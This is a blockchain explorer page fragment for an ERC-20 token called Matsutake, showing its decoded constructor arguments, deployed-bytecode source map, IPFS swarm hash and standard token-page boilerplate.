7cd8d5168fab821d0a7b9c7ed045417562fee4d29dbf1664736f6c63430008130033
Constructor Arguments (ABI-Encoded and is the last bytes of the Contract Creation Code above)
00000000000000000000000000000000000000000000000000000000000000a000000000000000000000000000000000000000000000000000000000000000e00000000000000000000000000000000000000000000000000000000000000012000000000000000000000000a6de5a07b7a6476a3c3784d5f32e4d73ba51bdb300000000000000000000000000000000000000064f964e68233a76f52000000000000000000000000000000000000000000000000000000000000000000000094d6174737574616b65000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000094d4154535554414b450000000000000000000000000000000000000000000000
-----Decoded View---------------
Arg [0] : name_ (string): Matsutake
Arg [1] : symbol_ (string): MATSUTAKE
Arg [2] : decimals_ (uint8): 18
Arg [3] : family (address): 0xA6de5a07B7A6476a3c3784D5F32e4D73ba51BdB3
Arg [4] : totalSupply_ (uint256): 500000000000000000000000000000
-----Encoded View---------------
9 Constructor Arguments found :
Arg [0] : 00000000000000000000000000000000000000000000000000000000000000a0
Arg [1] : 00000000000000000000000000000000000000000000000000000000000000e0
Arg [2] : 0000000000000000000000000000000000000000000000000000000000000012
Arg [3] : 000000000000000000000000a6de5a07b7a6476a3c3784d5f32e4d73ba51bdb3
Arg [4] : 00000000000000000000000000000000000000064f964e68233a76f520000000
Arg [5] : 0000000000000000000000000000000000000000000000000000000000000009
Arg [6] : 4d6174737574616b650000000000000000000000000000000000000000000000
Arg [7] : 0000000000000000000000000000000000000000000000000000000000000009
Arg [8] : 4d4154535554414b450000000000000000000000000000000000000000000000
Deployed Bytecode Sourcemap
13674:5908:0:-:0;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;14648:91;;;:::i;:::-;;;;;;;:::i;:::-;;;;;;;;15683:210;;;;;;:::i;:::-;;:::i;:::-;;;1169:14:1;;1162:22;1144:41;;1132:2;1117:18;15683:210:0;1004:187:1;14949:108:0;15037:12;;14949:108;;;1342:25:1;;;1330:2;1315:18;14949:108:0;1196:177:1;15901:455:0;;;;;;:::i;:::-;;:::i;13952:18::-;;;;;;14850:91;14924:9;;14850:91;;14924:9;;;;1853:36:1;;1841:2;1826:18;14850:91:0;1711:184:1;16364:300:0;;;;;;:::i;:::-;;:::i;15065:177::-;;;;;;:::i;:::-;-1:-1:-1;;;;;15216:18:0;15184:7;15216:18;;;:9;:18;;;;;;;15065:177;5467:94;;;:::i;:::-;;4816:87;4862:7;4889:6;-1:-1:-1;;;;;4889:6:0;4816:87;;;-1:-1:-1;;;;;2255:32:1;;;2237:51;;2225:2;2210:18;4816:87:0;2091:203:1;14747:95:0;;;:::i;14010:24::-;;;;;-1:-1:-1;;;;;14010:24:0;;;17851:247;;;;;;:::i;:::-;;:::i;16672:401::-;;;;;;:::i;:::-;;:::i;15250:216::-;;;;;;:::i;:::-;;:::i;15474:201::-;;;;;;:::i;:::-;-1:-1:-1;;;;;15640:18:0;;;15608:7;15640:18;;;:11;:18;;;;;;;;:27;;;;;;;;;;;;;15474:201;5716:192;;;;;;:::i;:::-;;:::i;13981:18::-;;;;;;14648:91;14693:13;14726:5;14719:12;;;;;:::i;:::-;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;:::i;:::-;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;14648:91;:::o;15683:210::-;15802:4;15824:39;3614:10;15847:7;15856:6;15824:8;:39::i;:::-;-1:-1:-1;15881:4:0;15683:210;;;;;:::o;15901:455::-;16041:4;16058:36;16068:6;16076:9;16087:6;16058:9;:36::i;:::-;16105:221;16128:6;3614:10;16176:139;16232:6;16176:139;;;;;;;;;;;;;;;;;-1:-1:-1;;;;;16176:19:0;;;;;;:11;:19;;;;;;;;3614:10;16176:33;;;;;;;;;;:37;:139::i;:::-;16105:8;:221::i;:::-;-1:-1:-1;16344:4:0;15901:455;;;;;:::o;16364:300::-;3614:10;16479:4;16573:25;;;:11;:25;;;;;;;;-1:-1:-1;;;;;16573:34:0;;;;;;;;;;16479:4;;16501:133;;16551:7;;16573:50;;16612:10;16573:38;:50::i;5467:94::-;4862:7;4889:6;-1:-1:-1;;;;;4889:6:0;3614:10;5036:23;5028:68;;;;-1:-1:-1;;;5028:68:0;;3640:2:1;5028:68:0;;;3622:21:1;;;3659:18;;;3652:30;3718:34;3698:18;;;3691:62;3770:18;;5028:68:0;;;;;;;;;5532:21:::1;5550:1;5532:9;:21::i;:::-;5467:94::o:0;14747:95::-;14794:13;14827:7;14820:14;;;;;:::i;17851:247::-;17151:9;;-1:-1:-1;;;;;17151:9:0;3614:10;-1:-1:-1;;;;;17135:25:0;;17117:75;;;;-1:-1:-1;;;17117:75:0;;4001:2:1;17117:75:0;;;3983:21:1;4040:2;4020:18;;;4013:30;4079:29;4059:18;;;4052:57;4126:18;;17117:75:0;3799:351:1;17117:75:0;18012:9:::1;:22:::0;;-1:-1:-1;;;;;;18012:22:0::1;-1:-1:-1::0;;;;;18012:22:0;::::1;;::::0;;18035:3:::1;:10:::0;;;18046:3:::1;:10:::0;;;18081:9:::1;18046:10:::0;18035;18081:9:::1;:::i;:::-;18068;::::0;-1:-1:-1;;;;;18068:9:0::1;18058:20;::::0;;;:9:::1;:20;::::0;;;;:32;-1:-1:-1;;;;17851:247:0:o;16672:401::-;16792:4;16814:229;3614:10;16864:7;16886:146;16943:15;16886:146;;;;;;;;;;;;;;;;;3614:10;16886:25;;;;:11;:25;;;;;;;;-1:-1:-1;;;;;16886:34:0;;;;;;;;;;;;:38;:146::i;15250:216::-;15372:4;15394:42;3614:10;15418:9;15429:6;15394:9;:42::i;5716:192::-;4862:7;4889:6;-1:-1:-1;;;;;4889:6:0;3614:10;5036:23;5028:68;;;;-1:-1:-1;;;5028:68:0;;3640:2:1;5028:68:0;;;3622:21:1;;;3659:18;;;3652:30;3718:34;3698:18;;;3691:62;3770:18;;5028:68:0;3438:356:1;5028:68:0;-1:-1:-1;;;;;5805:22:0;::::1;5797:73;;;::::0;-1:-1:-1;;;5797:73:0;;4662:2:1;5797:73:0::1;::::0;::::1;4644:21:1::0;4701:2;4681:18;;;4674:30;4740:34;4720:18;;;4713:62;-1:-1:-1;;;4791:18:1;;;4784:36;4837:19;;5797:73:0::1;4460:402:1::0;5797:73:0::1;5881:19;5891:8;5881:9;:19::i;:::-;5716:192:::0;:::o;18958:382::-;-1:-1:-1;;;;;19094:19:0;;19086:69;;;;-1:-1:-1;;;19086:69:0;;5069:2:1;19086:69:0;;;5051:21:1;5108:2;5088:18;;;5081:30;5147:34;5127:18;;;5120:62;-1:-1:-1;;;5198:18:1;;;5191:35;5243:19;;19086:69:0;4867:401:1;19086:69:0;-1:-1:-1;;;;;19174:21:0;;19166:69;;;;-1:-1:-1;;;19166:69:0;;5475:2:1;19166:69:0;;;5457:21:1;5514:2;5494:18;;;5487:30;5553:34;5533:18;;;5526:62;-1:-1:-1;;;5604:18:1;;;5597:33;5647:19;;19166:69:0;5273:399:1;19166:69:0;-1:-1:-1;;;;;19248:18:0;;;;;;;:11;:18;;;;;;;;:27;;;;;;;;;;;;;:36;;;19300:32;;1342:25:1;;;19300:32:0;;1315:18:1;19300:32:0;;;;;;;;18958:382;;;:::o;17230:613::-;-1:-1:-1;;;;;17370:20:0;;17362:71;;;;-1:-1:-1;;;17362:71:0;;5879:2:1;17362:71:0;;;5861:21:1;5918:2;5898:18;;;5891:30;5957:34;5937:18;;;5930:62;-1:-1:-1;;;6008:18:1;;;6001:36;6054:19;;17362:71:0;5677:402:1;17362:71:0;-1:-1:-1;;;;;17452:23:0;;17444:72;;;;-1:-1:-1;;;17444:72:0;;6286:2:1;17444:72:0;;;6268:21:1;6325:2;6305:18;;;6298:30;6364:34;6344:18;;;6337:62;-1:-1:-1;;;6415:18:1;;;6408:34;6459:19;;17444:72:0;6084:400:1;17444:72:0;17609:109;17645:6;17609:109;;;;;;;;;;;;;;;;;-1:-1:-1;;;;;17609:17:0;;;;;;:9;:17;;;;;;;:109;:21;:109::i;:::-;-1:-1:-1;;;;;17589:17:0;;;;;;;:9;:17;;;;;;:129;;;;17752:20;;;;;;;:32;;17777:6;17752:24;:32::i;:::-;-1:-1:-1;;;;;17729:20:0;;;;;;;:9;:20;;;;;;;:55;;;;17800:35;;;;;;;;;;17828:6;1342:25:1;;1330:2;1315:18;;1196:177;11181:240:0;11301:7;11362:12;11354:6;;;;11346:29;;;;-1:-1:-1;;;11346:29:0;;;;;;;;:::i;:::-;-1:-1:-1;;;11397:5:0;;;11181:240::o;8902:98::-;8960:7;8987:5;8991:1;8987;:5;:::i;:::-;8980:12;8902:98;-1:-1:-1;;;8902:98:0:o;5916:173::-;5972:16;5991:6;;-1:-1:-1;;;;;6008:17:0;;;-1:-1:-1;;;;;;6008:17:0;;;;;;6041:40;;5991:6;;;;;;;6041:40;;5972:16;6041:40;5961:128;5916:173;:::o;14:548:1:-;126:4;155:2;184;173:9;166:21;216:6;210:13;259:6;254:2;243:9;239:18;232:34;284:1;294:140;308:6;305:1;302:13;294:140;;;403:14;;;399:23;;393:30;369:17;;;388:2;365:26;358:66;323:10;;294:140;;;298:3;483:1;478:2;469:6;458:9;454:22;450:31;443:42;553:2;546;542:7;537:2;529:6;525:15;521:29;510:9;506:45;502:54;494:62;;;;14:548;;;;:::o;567:173::-;635:20;;-1:-1:-1;;;;;684:31:1;;674:42;;664:70;;730:1;727;720:12;664:70;567:173;;;:::o;745:254::-;813:6;821;874:2;862:9;853:7;849:23;845:32;842:52;;;890:1;887;880:12;842:52;913:29;932:9;913:29;:::i;:::-;903:39;989:2;974:18;;;;961:32;;-1:-1:-1;;;745:254:1:o;1378:328::-;1455:6;1463;1471;1524:2;1512:9;1503:7;1499:23;1495:32;1492:52;;;1540:1;1537;1530:12;1492:52;1563:29;1582:9;1563:29;:::i;:::-;1553:39;;1611:38;1645:2;1634:9;1630:18;1611:38;:::i;:::-;1601:48;;1696:2;1685:9;1681:18;1668:32;1658:42;;1378:328;;;;;:::o;1900:186::-;1959:6;2012:2;2000:9;1991:7;1987:23;1983:32;1980:52;;;2028:1;2025;2018:12;1980:52;2051:29;2070:9;2051:29;:::i;2299:484::-;2382:6;2390;2398;2406;2459:3;2447:9;2438:7;2434:23;2430:33;2427:53;;;2476:1;2473;2466:12;2427:53;2515:9;2502:23;2568:5;2561:13;2554:21;2547:5;2544:32;2534:60;;2590:1;2587;2580:12;2534:60;2613:5;-1:-1:-1;2637:38:1;2671:2;2656:18;;2637:38;:::i;:::-;2299:484;;2627:48;;-1:-1:-1;;;;2722:2:1;2707:18;;2694:32;;2773:2;2758:18;2745:32;;2299:484::o;2788:260::-;2856:6;2864;2917:2;2905:9;2896:7;2892:23;2888:32;2885:52;;;2933:1;2930;2923:12;2885:52;2956:29;2975:9;2956:29;:::i;:::-;2946:39;;3004:38;3038:2;3027:9;3023:18;3004:38;:::i;:::-;2994:48;;2788:260;;;;;:::o;3053:380::-;3132:1;3128:12;;;;3175;;;3196:61;;3250:4;3242:6;3238:17;3228:27;;3196:61;3303:2;3295:6;3292:14;3272:18;3269:38;3266:161;;3349:10;3344:3;3340:20;3337:1;3330:31;3384:4;3381:1;3374:15;3412:4;3409:1;3402:15;3266:161;;3053:380;;;:::o;4155:127::-;4216:10;4211:3;4207:20;4204:1;4197:31;4247:4;4244:1;4237:15;4271:4;4268:1;4261:15;4287:168;4360:9;;;4391;;4408:15;;;4402:22;;4388:37;4378:71;;4429:18;;:::i;6489:125::-;6554:9;;;6575:10;;;6572:36;;;6588:18;;:::i
Swarm Source
ipfs://1eb997aae3eee481357cd8d5168fab821d0a7b9c7ed045417562fee4d29dbf16
Loading...
Loading
Loading...
Loading
[ Download: CSV Export ]
[ Download: CSV Export ]
A token is a representation of an on-chain or off-chain asset. The token page shows information such as price, total supply, holders, transfers and social links. Learn more about this page in our Knowledge Base.